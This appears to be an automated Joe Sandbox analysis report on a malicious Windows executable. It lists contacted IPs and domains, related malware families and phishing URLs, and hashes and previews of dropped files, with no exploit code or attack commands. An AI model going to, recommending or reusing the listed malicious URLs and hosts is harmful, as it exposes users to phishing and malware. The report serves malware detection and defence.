101.99.75.174 | badlarrysguitars.com | Malaysia | 45839 | SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | true

IP
127.0.0.1
                                      Joe Sandbox version:41.0.0 Charoite
                                      Analysis ID:1570132
                                      Start date and time:2024-12-06 15:52:01 +01:00
                                      Joe Sandbox product:CloudBasic
                                      Overall analysis duration:0h 6m 23s
                                      Hypervisor based Inspection enabled:false
                                      Report type:full
                                      Cookbook file name:default.jbs
                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                      Run name:Run with higher sleep bypass
                                      Number of analysed new started processes analysed:21
                                      Number of new started drivers analysed:0
                                      Number of existing processes analysed:0
                                      Number of existing drivers analysed:0
                                      Number of injected processes analysed:0
                                      Technologies:
                                      • HCA enabled
                                      • EGA enabled
                                      • AMSI enabled
                                      Analysis Mode:default
                                      Analysis stop reason:Timeout
                                      Sample name:lg1wwLsmCX.exe
                                      renamed because original name is a hash value
                                      Original Sample Name:aa278fedf75ca629997113488d789e91f73a275575c22194c7bf7d59b30c9bc9.exe
                                      Detection:MAL
                                      Classification:mal52.winEXE@23/48@2/3
                                      EGA Information:Failed
                                      HCA Information:
                                      • Successful, ratio: 89%
                                      • Number of executed functions: 7
                                      • Number of non-executed functions: 0
                                      Cookbook Comments:
                                      • Found application associated with file extension: .exe
                                      • Sleeps bigger than 100000000ms are automatically reduced to 1000ms
                                      • Sleep loops longer than 100000000ms are bypassed. Single calls with delay of 100000000ms and higher are ignored
                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                      • Excluded IPs from analysis (whitelisted): 23.218.208.137, 172.64.41.3, 162.159.61.3, 184.30.24.109, 52.22.41.97, 3.219.243.226, 3.233.129.217, 52.6.155.20, 23.195.39.65, 199.232.214.172, 23.193.114.34, 23.193.114.8, 2.20.40.170, 2.20.68.210, 2.20.68.201, 2.16.158.145, 2.16.158.113, 2.19.126.149, 2.19.126.143
                                      • Excluded domains from analysis (whitelisted): e4578.dscg.akamaiedge.net, chrome.cloudflare-dns.com, e8652.dscx.akamaiedge.net, slscr.update.microsoft.com, e4578.dscb.akamaiedge.net, a767.dspw65.akamai.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, acroipm2.adobe.com, ssl-delivery.adobe.com.edgekey.net, e16604.g.akamaiedge.net, a122.dscd.akamai.net, prod.fs.microsoft.com.akadns.net, wu-b-net.trafficmanager.net, crl.root-x1.letsencrypt.org.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, acroipm2.adobe.com.edgesuite.net, ctldl.windowsupdate.com, p13n.adobe.io, fe3cr.delivery.mp.microsoft.com, download.windowsupdate.com.edgesuite.net, ssl.adobe.com.edgekey.net, armmf.adobe.com, geo2.adobe.com
                                      • Execution Graph export aborted for target lg1wwLsmCX.exe, PID 7712 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 7740 because it is empty
                                      • Execution Graph export aborted for target powershell.exe, PID 9188 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                      • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                      • VT rate limit hit for: lg1wwLsmCX.exe
                                      No simulations
Match | Associated Sample Name / URL | Detection | Threat Name | Context
54.224.241.105 | https://www.dropbox.com/l/AADbLOqftgPkdsTWgBgFyNpmu-iGeYJGM4I | malicious | Unknown |
54.224.241.105 | invoice-1664809283.pdf | malicious | Unknown |
54.224.241.105 | phish_alert_sp2_2.0.0.0 - 2024-08-06T131440.708.eml | malicious | Tycoon2FA |
54.224.241.105 | https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12 | malicious | HTMLPhisher |
54.224.241.105 | https://acrobat.adobe.com/id/urn:aaid:sc:EU:98ca4a25-984a-4511-9eb1-b7e6c5c56a12 | malicious | HTMLPhisher |
54.224.241.105 | Gestion-IMMO juillet (4) (1).pdf | malicious | Unknown |
54.224.241.105 | Complete_with DocuSign_Monday-July-2024 0738 AM.pdf | malicious | Unknown |
54.224.241.105 | [SUSPECTED SPAM] Your Delivery Has Been Delayed Due to an Address Issue.eml | malicious | Unknown |
54.224.241.105 | Scanner_SKME092878673568739809289728639802765768729809208.pdf | malicious | Unknown |
54.224.241.105 | https://acrobat.adobe.com/id/urn:aaid:sc:eu:ee698a8c-0f5f-4d49-8e57-941bebba7ea3 | malicious | HTMLPhisher |
101.99.75.174 | IFhqcKaIol.lnk | malicious | Unknown |
Match | Associated Sample Name / URL | Detection | Threat Name | Context
badlarrysguitars.com | IFhqcKaIol.lnk | malicious | Unknown | 101.99.75.174
bg.microsoft.map.fastly.net | file.exe | malicious | LummaC Stealer | 199.232.210.172
bg.microsoft.map.fastly.net | IFhqcKaIol.lnk | malicious | Unknown | 199.232.214.172
bg.microsoft.map.fastly.net | 17334905466c073176eadfc4a4d1af620c5aa97d12d1156570ede93d276f9fa6d51fffb6c5778.dat-decoded.exe | malicious | AsyncRAT | 199.232.210.172
bg.microsoft.map.fastly.net | phish_alert_sp2_2.0.0.0.eml | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 1733479268d0423578683b481c87d2b90a74213612e8837faf7f066c8e81ec92f9b2658c65965.dat-decoded.exe | malicious | AsyncRAT, VenomRAT | 199.232.210.172
bg.microsoft.map.fastly.net | 1733479274b6398afce8a86557af12b8f232b1cc4638f7df1d6de31554c2e013c23277a5b9785.dat-decoded.exe | malicious | PureCrypter | 199.232.214.172
bg.microsoft.map.fastly.net | mjf2ERXdI5.exe | malicious | Unknown | 199.232.210.172
bg.microsoft.map.fastly.net | 16547.js | malicious | MassLogger RAT | 199.232.214.172
bg.microsoft.map.fastly.net | Scan_03774843.pdf | malicious | Unknown | 199.232.210.172
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | IFhqcKaIol.lnk | malicious | Unknown | 101.99.75.174
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | Scan_03774843.pdf | malicious | Unknown | 101.99.77.51
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | https://oyatsu-jikan.org/#Z2FyeXRocm93JG5hdGlvbmFsdHViZXN1cHBseS5jb20= | malicious | Outlook Phishing, HTMLPhisher | 101.99.88.67
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | 442.docx.exe | malicious | RMSRemoteAdmin | 111.90.147.125
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | Vendor Agreement Ready for Your Signature November 22 2024 at 084923 PM.msg | malicious | HTMLPhisher | 101.99.75.104
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY | http://amz-account-unlock-dashboard4.duckdns.org | malicious | Unknown | 111.90.149.151
AMAZON-AESUS | https://dsbemcm.r.us-east-1.awstrack.me/L0/https:%2F%2Fmondialrelay-fr.pdfing.ai%2F/1/0100019399661370-1ce77c65-1b81-4233-8a20-5a39fd0f0317-000000/J1Yr9vKfHbZhazSj6gj8UC7ow80=403 | malicious | Unknown | 3.232.156.127
AMAZON-AESUS | IFhqcKaIol.lnk | malicious | Unknown | 3.219.243.226
AMAZON-AESUS | jew.sh4.elf | malicious | Unknown | 44.221.131.20
AMAZON-AESUS | file.exe | malicious | Clipboard Hijacker, Cryptbot | 44.196.3.45
AMAZON-AESUS | jew.mips.elf | malicious | Unknown | 54.42.218.193
AMAZON-AESUS | file.exe | malicious | Amadey, LummaC Stealer, PureLog Stealer, Stealc, Vidar | 44.196.3.45
AMAZON-AESUS | https://us-api.mimecast.com.kb4.io/XWko4Q0hGOG85d2pSNGFBUW1UaEJSL09QUThzR2hrYWl3UGh4aEFVNkQ0dW1jU0FrdnhwRFB2clh1VmRINlRhSTJXNkM0N2NiS0J6WWlVRENjUVlPSWZYbk9xUkNaRDNGSjR3OU1Jd2RSdlJKL0k2cjZWV0ozK1BLRWRrZWJucElFUGVXcFpkM2hlOXluYlErY01WYkRnNmtzUldXNlJEcmIvN0Z0WVNMOHNobW5lMjVGcEdENDA0TWZNblZTWFVuRUp3PS0taC91cHJQRm5XdmFVejBTdC0tWVNTU2ZrYnF5clZ0ZndVU0tiNHIzUT09?cid=2313358952 | malicious | KnowBe4 | 54.85.18.81
AMAZON-AESUS | file.exe | malicious | Clipboard Hijacker, Cryptbot | 34.224.200.202
AMAZON-AESUS | https://i.postimg.cc/y6hBTtv7/png-Hand-SAward.png | malicious | HTMLPhisher | 54.224.154.88
Match | Associated Sample Name / URL | Detection | Threat Name | Context
3b5074b1b5d032e5620f69f9f700ff0e | ljshdfglksdfNEW.bat | malicious | Abobus Obfuscator, Braodo | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | kjhsdg.bat | malicious | Abobus Obfuscator, Braodo | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | kjshdf.bat | malicious | Abobus Obfuscator, Braodo | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | kjsdhfgs.bat | malicious | Abobus Obfuscator, Braodo | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | 980001672 PPR for 30887217.scr.exe | malicious | AgentTesla | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | y1rS62yprs.exe | malicious | Babadeda | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | IFhqcKaIol.lnk | malicious | Unknown | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | JSWunwO4rS.lnk | malicious | LummaC Stealer | 101.99.75.174
3b5074b1b5d032e5620f69f9f700ff0e | 7p5nITtglJ.lnk | malicious | Abobus Obfuscator, Braodo | 101.99.75.174
                                                            No context
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):8192
                                                            Entropy (8bit):0.35999246155449205
                                                            Encrypted:false
                                                            SSDEEP:6:6xpoaaD0JOCEfMuaaD0JOCEfMKQmDaxpoaaD0JOCEfMuaaD0JOCEfMKQmD:7aaD0JcaaD0JwQQbaaD0JcaaD0JwQQ
                                                            MD5:54D24A9E5B26A574BA88CC61575C44B3
                                                            SHA1:A7BBFB0021907F5A1C0495798440344743155DA8
                                                            SHA-256:502373EC6695657DE5CE332F59FD5E091570CFA5807C961F7EDD11805277F5D6
                                                            SHA-512:16B23BF128E761E1B68F0C62D678E0FEAB634F3ADB2BA3DB7B22DA7753A90C059E13F744F1787A602AC443A72402BED9BA657CF4000EEF351649C9A5F02BF986
                                                            Malicious:false
                                                            Preview:*.>.................D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@....................................................................................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.8847323213368606
                                                            Encrypted:false
                                                            SSDEEP:1536:0JVRkX56mk0alaS0aHH0anjJ8PUWJ81s5J8RMvCxwtYD0pQoltqNeveEQYQ1aG9o:0J7adfWuK0p/QDfKoPeuP0aN4fqoxP
                                                            MD5:ECFC47EB4F9CD79CCB464DA8C1B02BD6
                                                            SHA1:4E47278A804120CF56B45C0FED7857E56D31210C
                                                            SHA-256:9FCA5E8D68C5A30BC169EA2189D8E3A27E05E50A26D1CC494CAECB4CAD10DF89
                                                            SHA-512:CEC4794603B6C413188C4D0F350893D31BD08817DE8424FDA5592B6CD344BEBEEEF71F52E6223F4645BA86FD84F3B2BD5663BDAC206F1D0FF40001E4683431BC
                                                            Malicious:false
                                                            Preview:2.e.........@..@12...{...;...{..........<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@.................................K<...kS..#.........`h.................h.......0.......X\...;...{..................C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b....................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0x12b1c712, page size 16384, Windows version 10.0
                                                            Category:dropped
                                                            Size (bytes):1310720
                                                            Entropy (8bit):0.6555055419351438
                                                            Encrypted:false
                                                            SSDEEP:1536:RSB2ESB2SSjlK/2VT9Dr1k0aXjJ8VQCYkr3g1652UPkLk+kAv/gKr51KrSSfSDZ5:RazaAVVL4y2UC
                                                            MD5:AD27C98119AD60144298A41292ACC85A
                                                            SHA1:00735CD5B02C0C5B4B335725833C9A90EFDF6076
                                                            SHA-256:2AF1E0541E093C265315A0589D47CDA8630F9C85545AB48D44D3FB79A32DB64C
                                                            SHA-512:116FD81E5DDE7CA8299040F61B20AC44A26662548B75A8CF22CAAB3D4FC3EEDF306E05671EFBD910C671279AF34ED53D9DDD6322B8C1BA71EE68963DDA2936B0
                                                            Malicious:false
                                                            Preview:....... ...............X\...;...{......................0........7...|...5...|5.h........7...|..0...........D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ............................................................................................................................................................................................................2...{...................................P0..7...|.8.................$...7...|...........................#......0.......................................................................................................................................................................................................................................................................................................................................................
                                                            Process:C:\Windows\System32\svchost.exe
                                                            File Type:OpenPGP Public Key
                                                            Category:dropped
                                                            Size (bytes):16384
                                                            Entropy (8bit):0.08064424977913105
                                                            Encrypted:false
                                                            SSDEEP:3:b3yXUetYeRWrjpKlj2ZQvK3SnwXlUYZQlqllwiTGtlZPz0ll:TQzRsjpKd2KcXSrQWiCpPQ
                                                            MD5:5C9B482BDE6D56AA7519E5A8A5716732
                                                            SHA1:6793F0F5184B6588747AF0D4E9E5FED9811DD5B6
                                                            SHA-256:05B90D717B5D36F0BC781BDCF0502C75189E02A3F97D071E4B90412261FB47BF
                                                            SHA-512:2FF2D3A1285ED58C1B74DB5EDAE33A30A0F4C81BB6A74265CF2E7F94BB25D68EAE85C10ECADA2DE7B41C0C772063156BCC6097A05D3CC3C28D56C32AC568C0C9
                                                            Malicious:false
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):290
                                                            Entropy (8bit):5.257550821670414
                                                            Encrypted:false
                                                            SSDEEP:6:FdZj3cM+q2PFi2nKuAl9OmbnIFUt8cdJNF3JZmw+cdJtUScMVkwOFi2nKuAl9Omt:FdpcM+vdZHAahFUt8cdJnJ/+cdJtUScg
                                                            MD5:3EFB81B6E06AD70E2C7AAE7CEFFB4D96
                                                            SHA1:07EF64AFCD5C56B6E7CC3BFB136FB724552CE15C
                                                            SHA-256:577F21577BA776E18A23ADB1A6042EF74688E0B46BABD63AAF78F88ED6194EC5
                                                            SHA-512:0A493F03CCA9F13C501A3FD7BDBAFDC08302AAF0D0D97F46E5DACEAF55086196BD2894ADA9EAB6F1323BD95AC1B8A7E6EB11339B7F7B98C21FDD23B9D8BC7367
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:03.367 168c Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/MANIFEST-000001.2024/12/06-09:53:03.415 168c Recovering log #3.2024/12/06-09:53:03.466 168c Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):334
                                                            Entropy (8bit):5.188712931745028
                                                            Encrypted:false
                                                            SSDEEP:6:FdLo9yq2PFi2nKuAl9Ombzo2jMGIFUt8cdLu1Zmw+cdLcNRkwOFi2nKuAl9Ombzz:Fdk9yvdZHAa8uFUt8cdU/+cdANR5wZHA
                                                            MD5:A8F7803ED0464F66FD238B058464BE4E
                                                            SHA1:292EDA8FAE66465D27BD0F182BE54084A867A906
                                                            SHA-256:68DE7026214C29FAAAE10D4129C1098A11B4F95748F333DA7E0F8CA2ED92BA52
                                                            SHA-512:2C8262A239DCEE27F0EBDF0CD3FEB51904C0B53947178BA8DD20AE3D0DDFC43AB13952F7F391486D788F8770A79215E0EC60C869E031C8294DEDF22BC837CD65
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:03.615 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/MANIFEST-000001.2024/12/06-09:53:03.619 1e70 Recovering log #3.2024/12/06-09:53:03.620 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Local Storage\leveldb/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:JSON data
                                                            Category:modified
                                                            Size (bytes):476
                                                            Entropy (8bit):4.980180404041981
                                                            Encrypted:false
                                                            SSDEEP:12:YH/um3RA8sqtOXhsBdOg2Hicaq3QYiubpP7E4TX:Y2sRdsFXydMHt3QYhbd7n7
                                                            MD5:86572CC1C1C2CE31CF006CBF404F4280
                                                            SHA1:37D862AE0AD2BECDEC39931817F5C28ECF722825
                                                            SHA-256:B9C85BA49DAACA2939585AC8DF8DB04D7771493A8155E8CE53A03ADD2BAB70F7
                                                            SHA-512:07B21D9C72C85F372015A67FA0765AEB8A7909DEDCB89AB2C419493AB058D5DED76BC00ABC4DC4240F526D087393579C517D425B06E80E974E031B3EA3F50C62
                                                            Malicious:false
                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378056792238736","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":652924},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:JSON data
                                                            Category:dropped
                                                            Size (bytes):476
                                                            Entropy (8bit):4.962905575204746
                                                            Encrypted:false
                                                            SSDEEP:12:YH/um3RA8sqUT9ksBdOg2Hh7caq3QYiubpP7E4TX:Y2sRds5TdMH43QYhbd7n7
                                                            MD5:F371FDA655516B50D489FC8CFB1306C9
                                                            SHA1:26FAC2270B5A1180925A6B601A8DA8AC188A0096
                                                            SHA-256:730853F0624FCDD3E7C3874FE9A3249995249013D2EBD7F87AAC2A7EB8EF699A
                                                            SHA-512:B8E2189A814C4063996FFF065FAFADE9EF12B7A01408572BCD3844C3CE7BDA1C8750B0DE390CCB61F0BB1193D01574B34C80A8BC5971C8429D8763C45298F8BA
                                                            Malicious:false
                                                            Preview:{"net":{"http_server_properties":{"servers":[{"isolation":[],"server":"https://armmf.adobe.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13341061835820912","port":443,"protocol_str":"quic"}],"isolation":[],"network_stats":{"srtt":149104},"server":"https://chrome.cloudflare-dns.com","supports_spdy":true}],"supports_quic":{"address":"192.168.2.10","used_quic":true},"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):3878
                                                            Entropy (8bit):5.2262130939836515
                                                            Encrypted:false
                                                            SSDEEP:96:wshFT0h7cA4YC2EVPCqY35NEmNOYcGPtqKYSEVCJjiE:wshFT0h7cZb2EVKZPEANcGIK5EVCJj7
                                                            MD5:555E0240702CF764F039D81F7904F18E
                                                            SHA1:2853D4E46BEB41DBE46B6E34D13BA6F04975675C
                                                            SHA-256:4932A9FD109FE5CAE9FE1359E786C2C16292829569D2BA0CAB1832840CDE86D5
                                                            SHA-512:36435757BB17F26FD30B110FFFDDE789E141645354573D95C17B2145A4F86172A5F7674D97FFEDFFC0CE6C9EF745599D2F49C53BBE55BC586FEF60075C1FBC67
                                                            Malicious:false
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:ASCII text
                                                            Category:dropped
                                                            Size (bytes):322
                                                            Entropy (8bit):5.194926894991962
                                                            Encrypted:false
                                                            SSDEEP:6:Fd+NlFlyq2PFi2nKuAl9OmbzNMxIFUt8cd+7z1Zmw+cd+glRkwOFi2nKuAl9Ombg:FdQyvdZHAa8jFUt8cdK/+cdZlR5wZHAo
                                                            MD5:CFB941B42665161AB9E585092480A19A
                                                            SHA1:54FCC8A4E8BFE81A100882839726DDE03CF9357D
                                                            SHA-256:39B2867E5D25AEFC638A4BDED284FEFE76CFE6980B0F7405291DFA168508EAB0
                                                            SHA-512:F00B7C340F75E7037B17BC548F8FA018B04C97715E35905A8CC2378F6B9FC291396DF6A49619F914C8CDCAAC483B49AA7FF9DA234DDED62DBBF7B8F678E6963C
                                                            Malicious:false
                                                            Preview:2024/12/06-09:53:04.003 1e70 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/06-09:53:04.041 1e70 Recovering log #3.2024/12/06-09:53:04.068 1e70 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                            Category:dropped
                                                            Size (bytes):86016
                                                            Entropy (8bit):4.438911817338383
                                                            Encrypted:false
                                                            SSDEEP:384:yejci5GiiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:0SurVgazUpUTTGt
                                                            MD5:A24CA2DA68A4573A248FDFECD3A4712D
                                                            SHA1:819AA8720B62F43CF43148A32788EBAB050BE934
                                                            SHA-256:AA6FDD1FA279F750CF0B5A16E7B065D623ECDE1ED3DCFD31E7AFFCC87A486DD2
                                                            SHA-512:409EACF4EAC6CF6941F53D7209E1AF88D7637CE56E52412C5517C06C7E617D572EDF0ACA3A667F84904D32600A16107D1A36F1C2AFEF07C20B46D96E17BA1179
                                                            Malicious:false
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:SQLite Rollback Journal
                                                            Category:dropped
                                                            Size (bytes):8720
                                                            Entropy (8bit):3.775002245407451
                                                            Encrypted:false
                                                            SSDEEP:48:7MAp/E2ioyVlioy5oWoy1CUoy1BKOioy1noy1AYoy1Wioy1hioybioyRoy1noy14:7bpjulJEXKQk8b9IVXEBodRBkR
                                                            MD5:4536610AA688A494A69A20C6EF70B9C5
                                                            SHA1:16A87449C1F7FAC6B799A4AE12C546C69671F060
                                                            SHA-256:616AEE7E72063A7AE7A0B98B78776518E23AD6EFE2529492914C1DE94876B489
                                                            SHA-512:FB208E4684CBED8CCFCB95D05CD4B7D83ED65CB1470D3E90E0EDFE9BA140B17340717A3ACE1D72F3CCD73D3E0024285D8B8DD78CB12EE38DBCC9231FE72D1727
                                                            Malicious:false
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:Certificate, Version=3
                                                            Category:dropped
                                                            Size (bytes):1391
                                                            Entropy (8bit):7.705940075877404
                                                            Encrypted:false
                                                            SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                            MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                            SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                            SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                            SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                            Malicious:false
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                            Category:dropped
                                                            Size (bytes):71954
                                                            Entropy (8bit):7.996617769952133
                                                            Encrypted:true
                                                            SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                            MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                            SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                            SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                            SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                            Malicious:false
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):192
                                                            Entropy (8bit):2.775162490582081
                                                            Encrypted:false
                                                            SSDEEP:3:kkFkloi9WLlXfllXlE/HT8kyRu1NNX8RolJuRdxLlGB9lQRYwpDdt:kKxoWL2T8YNMa8RdWBwRd
                                                            MD5:71B3A7A9426B5C8365C26A70EE066D79
                                                            SHA1:35A4CB9662BE5476255C7132F2C55115A42954C9
                                                            SHA-256:1809BAA260216A02ED6AFD7C60E5ACAD512D1ADADF23552A3DC7F89EDC39AC91
                                                            SHA-512:6AB2FC7B4CFC2DAC7382CB3632A7D8E5A9C3BFD55B05694CF7A93AFE604A940097109C46932BBBA071CF7307C72427906F967DF7FC8ADD3FD328AC3686D4928F
                                                            Malicious:false
                                                            Preview:p...... ........[....G..(....................................................... ..........W.....4..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                            File Type:data
                                                            Category:dropped
                                                            Size (bytes):328
                                                            Entropy (8bit):3.247897867253901
                                                            Encrypted:false
                                                            SSDEEP:6:kKZlD9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:eDImsLNkPlE99SNxAhUe/3
                                                            MD5:CD59C006FFF77242B6A183C306071D76
                                                            SHA1:F52CBEAFB02CED0E6C8AAFF92496680521F0126C
                                                            SHA-256:BAA410662023700470FCD7D9252D356983AC353CB38C8F49A0EE8C66AE0A0440
                                                            SHA-512:8B45B8DD9F7AEED0880AF43F2AC80A3ECD07AB49EBF063191C02D3FA2E4D7AD59C9AA6F923B99553EDB1541D0657EE18FE08916BE98BD376A64C4D883C51CCCC
                                                            Malicious:false
                                                            Preview:p...... .............G..(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                            Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                            File Type:PostScript document text
                                                            Category:dropped
                                                            Size (bytes):1233
                                                            Entropy (8bit):5.233980037532449
                                                            Encrypted:false
                                                            SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                            MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                            SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                            SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                            SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                            Malicious:false
